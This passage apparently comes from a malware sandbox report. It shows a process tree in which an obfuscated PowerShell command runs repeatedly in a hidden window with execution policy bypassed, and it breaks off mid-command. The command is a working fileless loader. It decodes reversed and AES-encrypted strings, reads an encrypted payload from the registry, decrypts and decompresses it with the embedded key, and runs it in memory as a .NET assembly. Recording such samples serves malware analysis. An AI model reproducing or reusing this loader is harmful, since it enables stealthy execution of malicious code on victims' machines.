$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:6888
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:2292
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        Hide Artifacts: Hidden Window
        
        PID:6680
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = 